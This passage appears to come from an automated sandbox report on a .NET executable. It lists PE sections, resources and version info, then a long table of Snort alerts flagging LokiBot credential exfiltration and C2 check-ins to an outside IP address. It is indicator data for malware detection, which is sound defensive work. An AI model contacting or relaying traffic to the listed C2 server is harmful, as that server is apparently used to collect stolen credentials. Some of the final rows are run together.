                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                              Sections

                                              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                              .text | 0x2000 | 0x69014 | 0x69200 | False | 0.106985266795 | data | 4.74374955129 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rsrc | 0x6c000 | 0x60c | 0x800 | False | 0.34521484375 | data | 4.89513334519 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc | 0x6e000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              Name | RVA | Size | Type | Language | Country
                                              RT_VERSION | 0x6c0a0 | 0x380 | data | English | United States
                                              RT_MANIFEST | 0x6c420 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                              Imports

                                              DLL | Import
                                              mscoree.dll | _CorExeMain

                                              Version Infos

                                              Description | Data
                                              LegalCopyright | All Rights Reserved
                                              Assembly Version | 5.870.486.295
                                              InternalName | .exe
                                              FileVersion | 5.870.486.295
                                              CompanyName | Inc.
                                              LegalTrademarks |
                                              Comments |
                                              ProductName |
                                              ProductVersion | 5.870.486.295
                                              FileDescription |
                                              OriginalFilename | .exe
                                              Translation | 0x0000 0x0514

                                              Possible Origin

                                              Language of compilation system | Country where language is spoken | Map
                                              English | United States |

                                              Network Behavior

                                              Snort IDS Alerts

                                              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                              03/15/21-20:00:59.299750 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49696 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:00:59.299750 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49696 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:00:59.299750 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49696 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:00:59.299750 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49696 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:00:59.912760 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49697 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:00:59.912760 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49697 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:00:59.912760 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49697 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:00:59.912760 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49697 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:01.352142 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49698 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:01.352142 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49698 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:01.352142 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49698 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:01.352142 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49698 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:01.791880 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49698 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:02.461606 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49699 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:02.461606 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49699 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:02.461606 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49699 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:02.461606 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49699 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:02.822240 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49699 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:03.117405 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49700 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:03.117405 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49700 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:03.117405 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49700 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:03.117405 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49700 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:03.381765 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49700 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:04.226190 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49701 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:04.226190 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49701 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:04.226190 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49701 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:04.226190 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49701 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:07.057657 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49701 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:07.329028 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49702 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:07.329028 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49702 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:07.329028 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49702 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:07.329028 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49702 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:08.041174 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49702 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:08.319140 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49703 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:08.319140 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49703 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:08.319140 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49703 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:08.319140 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49703 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:09.199748 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49703 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:09.459261 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49704 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:09.459261 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49704 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:09.459261 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49704 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:09.459261 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49704 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:09.990872 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49704 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:10.247131 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49706 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:10.247131 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49706 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:10.247131 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49706 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:10.247131 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49706 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:10.543726 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49706 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:10.814030 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49707 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:10.814030 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49707 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:10.814030 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49707 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:10.814030 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49707 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:11.073519 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49707 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:11.333466 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49708 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:11.333466 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49708 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:11.333466 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49708 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:11.333466 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49708 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:11.586393 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49708 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:11.848733 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49709 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:11.848733 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49709 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:11.848733 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49709 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:11.848733 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49709 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:12.111888 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49709 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:12.375237 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49710 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:12.375237 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49710 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:12.375237 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49710 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:12.375237 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49710 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:12.661371 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49710 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:12.929997 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49711 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:12.929997 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49711 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:12.929997 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49711 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:12.929997 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49711 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:13.460848 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49711 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:13.736500 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49712 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:13.736500 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49712 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:13.736500 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49712 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:13.736500 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49712 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:14.088730 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49712 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:14.345824 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49713 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:14.345824 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49713 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:14.345824 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49713 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:14.345824 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49713 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:14.636305 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49713 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:14.911690 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49714 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:14.911690 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49714 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:14.911690 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49714 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:14.911690 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49714 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:15.317789 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49714 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:15.558859 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49715 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:15.558859 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49715 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:15.558859 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49715 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:15.558859 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49715 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:15.838733 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49715 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:16.089930 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49716 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:16.089930 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49716 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:16.089930 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49716 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:16.089930 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49716 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:16.392034 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49716 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:16.657506 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49717 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:16.657506 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49717 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:16.657506 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49717 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:16.657506 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49717 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:16.946177 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49717 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:17.197165 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49718 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:17.197165 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49718 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:17.197165 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49718 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:17.197165 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49718 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:17.449021 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49718 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:17.695734 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49719 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:17.695734 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49719 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:17.695734 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49719 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:17.695734 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49719 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:17.987251 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49719 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:18.244799 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49720 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:18.244799 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49720 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:18.244799 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49720 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:18.244799 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49720 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:18.718092 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49720 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:18.964074 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49721 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:18.964074 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49721 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:18.964074 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49721 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:18.964074 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49721 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:19.322258 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49721 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:19.791693 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49722 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:19.791693 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49722 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:19.791693 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49722 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:19.791693 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49722 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:20.117541 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49722 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:20.361542 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49723 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:20.361542 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49723 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:20.361542 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49723 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:20.361542 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49723 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:20.618341 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49723 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:21.004334 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49724 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:21.004334 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49724 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:21.004334 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49724 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:21.004334 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49724 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:21.287939 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49724 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:22.062018 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49725 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:22.062018 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49725 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:22.062018 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49725 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:22.062018 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49725 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:23.039788 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49725 | 87.251.79.157 | 192.168.2.5
                                              03/15/21-20:01:23.293570 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49726 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:23.293570 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49726 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:23.293570 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49726 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:23.293570 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49726 | 80 | 192.168.2.5 | 87.251.79.157
                                              03/15/21-20:01:25.291952TCP2025483ET TROJAN LokiBot Fake 404 Response804972687.251.79.157192.168.2.5
                                              03/15/21-20:01:25.581075TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972780192.168.2.587.251.79.157
                                              03/15/21-20:01:25.581075TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972780192.168.2.587.251.79.157
                                              03/15/21-20:01:25.581075TCP2025381ET TROJAN LokiBot Checkin4972780192.168.2.587.251.79.157
                                              03/15/21-20:01:25.581075TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972780192.168.2.587.251.79.157
                                              03/15/21-20:01:26.542694TCP2025483ET TROJAN LokiBot Fake 404 Response804972787.251.79.157192.168.2.5
                                              03/15/21-20:01:26.790848TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972880192.168.2.587.251.79.157
                                              03/15/21-20:01:26.790848TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972880192.168.2.587.251.79.157
                                              03/15/21-20:01:26.790848TCP2025381ET TROJAN LokiBot Checkin4972880192.168.2.587.251.79.157
                                              03/15/21-20:01:26.790848TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972880192.168.2.587.251.79.157
                                              03/15/21-20:01:27.122605TCP2025483ET TROJAN LokiBot Fake 404 Response804972887.251.79.157192.168.2.5
                                              03/15/21-20:01:27.364126TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972980192.168.2.587.251.79.157
                                              03/15/21-20:01:27.364126TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972980192.168.2.587.251.79.157
                                              03/15/21-20:01:27.364126TCP2025381ET TROJAN LokiBot Checkin4972980192.168.2.587.251.79.157
                                              03/15/21-20:01:27.364126TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972980192.168.2.587.251.79.157
                                              03/15/21-20:01:27.610562TCP2025483ET TROJAN LokiBot Fake 404 Response804972987.251.79.157192.168.2.5
                                              03/15/21-20:01:27.852823TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973080192.168.2.587.251.79.157
                                              03/15/21-20:01:27.852823TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.587.251.79.157
                                              03/15/21-20:01:27.852823TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.587.251.79.157
                                              03/15/21-20:01:27.852823TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973080192.168.2.587.251.79.157
                                              03/15/21-20:01:28.146227TCP2025483ET TROJAN LokiBot Fake 404 Response804973087.251.79.157192.168.2.5
                                              03/15/21-20:01:28.400492TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.587.251.79.157
                                              03/15/21-20:01:28.400492TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.587.251.79.157
                                              03/15/21-20:01:28.400492TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.587.251.79.157
                                              03/15/21-20:01:28.400492TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973180192.168.2.587.251.79.157
                                              03/15/21-20:01:28.677203TCP2025483ET TROJAN LokiBot Fake 404 Response804973187.251.79.157192.168.2.5
                                              03/15/21-20:01:28.911929TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973280192.168.2.587.251.79.157
                                              03/15/21-20:01:28.911929TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973280192.168.2.587.251.79.157
                                              03/15/21-20:01:28.911929TCP2025381ET TROJAN LokiBot Checkin4973280192.168.2.587.251.79.157
                                              03/15/21-20:01:28.911929TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973280192.168.2.587.251.79.157
                                              03/15/21-20:01:29.195779TCP2025483ET TROJAN LokiBot Fake 404 Response804973287.251.79.157192.168.2.5
                                              03/15/21-20:01:29.450562TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973380192.168.2.587.251.79.157
